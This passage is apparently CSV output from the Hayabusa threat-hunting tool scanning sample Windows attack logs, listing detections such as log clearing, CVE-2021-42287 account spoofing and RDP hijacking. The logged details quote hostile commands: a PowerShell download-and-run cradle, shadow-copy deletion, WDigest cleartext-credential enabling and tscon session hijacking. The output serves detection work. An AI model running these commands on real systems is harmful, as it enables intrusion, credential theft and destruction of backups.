admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.696 +09:00,rootdc1.offsec.lan,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:48.908 +09:00,rootdc1.offsec.lan,4781,critical,,Suspicious Computer Account Name Change CVE-2021-42287,,../hayabusa-rules/sigma/builtin/security/win_samaccountname_spoofing_cve_2021_42287.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4781-Computer account renamed without a trailing $ (CVE-2021-42278).evtx 2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.222 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rootdc1 | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx 2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.255 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: rootdc1@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.123.11 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4768-4769-Kerberos host ticket without a trailing $.evtx 2021-12-14 23:42:49.287 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.306 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.309 +09:00,rootdc1.offsec.lan,4776,info,,NTLM Logon To Local Account,User: HealthMailboxa935ecda17404b4a85c3f146fe1def56@offsec.lan | Computer: EXCHANGE01 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.886 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmhorvath | Computer: - | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.889 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.927 +09:00,rootdc1.offsec.lan,4697,info,Persis,Service Installed,Name: BTOBTO | Path: %COMSPEC% /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat | User: admmhorvath | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.937 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1624 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.947 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Path: C:\Windows\System32\cmd.exe | PID: 0x1138 | User: ROOTDC1$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.986 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\IPC$ | Share Path: | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:49.989 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x308fd50bf,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.007 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.008 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: ROOTDC1$ | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 127.0.0.1 | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.031 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.033 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.046 +09:00,rootdc1.offsec.lan,5140,info,Collect,Network Share Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-14 23:42:50.049 +09:00,rootdc1.offsec.lan,5145,info,Collect,Network Share File Access,User: admmhorvath | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: __output | IP Addr: 10.23.123.11 | LID: 0x308fd3169,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID47x,4661-4662,5136,4688,4697-SAM the admin (CVE-2021-42287).evtx" 2021-12-18 07:44:18.475 +09:00,FS03.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1076,technique_name=Remote Desktop Protocol | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services | Process: C:\Windows\system32\reg.exe | PID: 2848 | PGUID: 7CF65FC7-12C2-61BD-EA04-000000001400",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0009-Collection/T1125-Video capture/ID13-RDP shadow session configuration enabled (registry).evtx 2021-12-19 23:33:08.147 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete Window backup (webadmin).evtx 2021-12-19 23:48:19.294 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx 2021-12-19 23:48:21.231 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: wmic nteventlog where filename=""security"" cl | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0xff0 | User: admmig | LID: 0x542c77d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID4688-Clear event log attempt (wmi).evtx 2021-12-19 23:51:04.020 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: wmic shadowcopy delete /nointeractive | Path: C:\Windows\System32\wbem\WMIC.exe | PID: 0x12c | User: admmig | LID: 0x542c77d,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID4688-Delete VSS backup (WMI).evtx 2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,{$_.Delete();},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,low,Persis,Suspicious Get-WmiObject,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_gwmi.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.010 +09:00,FS03.offsec.lan,4104,high,Impact,Delete Volume Shadow Copies via WMI with PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Shadowcopy"" CommandInvocation(ForEach-Object): ""ForEach-Object"" ParameterBinding(ForEach-Object): name=""Process""; value=""$_.Delete();""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.026 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2021-12-20 00:13:49.041 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0040-Impact/T1490-Inhibit System Recovery/ID800-4103-4104-Delete VSS backup (PowerShell).evtx 2022-01-07 07:27:21.255 +09:00,win10-02.offsec.lan,4688,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1204-User execution/ID4688-Edge payload download via command.evtx 2022-01-08 07:05:06.936 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx 2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: /c whoami | Path: C:\Windows\System32\cmd.exe | PID: 0xd7c | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx 2022-01-08 07:05:07.640 +09:00,FS03.offsec.lan,4648,medium,PrivEsc | LatMov,Explicit Logon: Suspicious Process,Src User: admmig | Tgt User: test10 | IP Addr: - | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Svr: localhost,../hayabusa-rules/hayabusa/default/alerts/Security/4648_ExplicitLogon_SuspiciousProcess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1134-Access Token Manipulation/ID4648-4624-RunAsCS login.evtx 2022-01-25 02:03:24.224 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" 2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Persis,Hidden User Account Created! (Possible Backdoor),User: 3teamssixf$ | SID: S-1-5-21-2721507831-1374043488-2540227515-1008,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_ComputerAccountCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" 2022-01-25 02:03:25.002 +09:00,fs03vuln.offsec.lan,4720,high,Evas,New or Renamed User Account with '$' in Attribute 'SamAccountName'.,,../hayabusa-rules/sigma/builtin/security/win_new_or_renamed_user_account_with_dollar_sign.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" 2022-01-25 02:03:25.004 +09:00,fs03vuln.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-2721507831-1374043488-2540227515-1008 | Group: Administrators | LID: 0x14f509e2,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" 2022-01-25 02:03:25.012 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: regedit /s .sTRmxJkRFoTFaPRXBeavZhjaAYNvpYko.reg | Path: C:\Windows\regedit.exe | PID: 0x101c | User: admmig | LID: 0x14f509e2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID472, 4728 Hidden user creation.evtx" 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"""IEX(New-Object Net.WebClient).downloadString('https://miro.medium.com/max/1400/1*FnPDYeZVrGTbuE7Lj7JhgQ.png')""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx 2022-01-25 05:11:11.361 +09:00,fs03vuln.offsec.lan,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID4103-4104-Payload download via PowerShell.evtx 2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx 2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx 2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx 2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,../hayabusa-rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx 2022-02-09 05:33:10.918 +09:00,wef.windomain.local,4697,info,Persis,Service Installed,Name: rdphijack2 | Path: cmd.exe /k tscon 2 /dest rdp-tcp#14 | User: user | SrvAccount: LocalSystem | SrvType: 0x10 | SrvStartType: 3 | LID: 0x1945c67,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx 2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx 2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx 2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx 2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx 2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 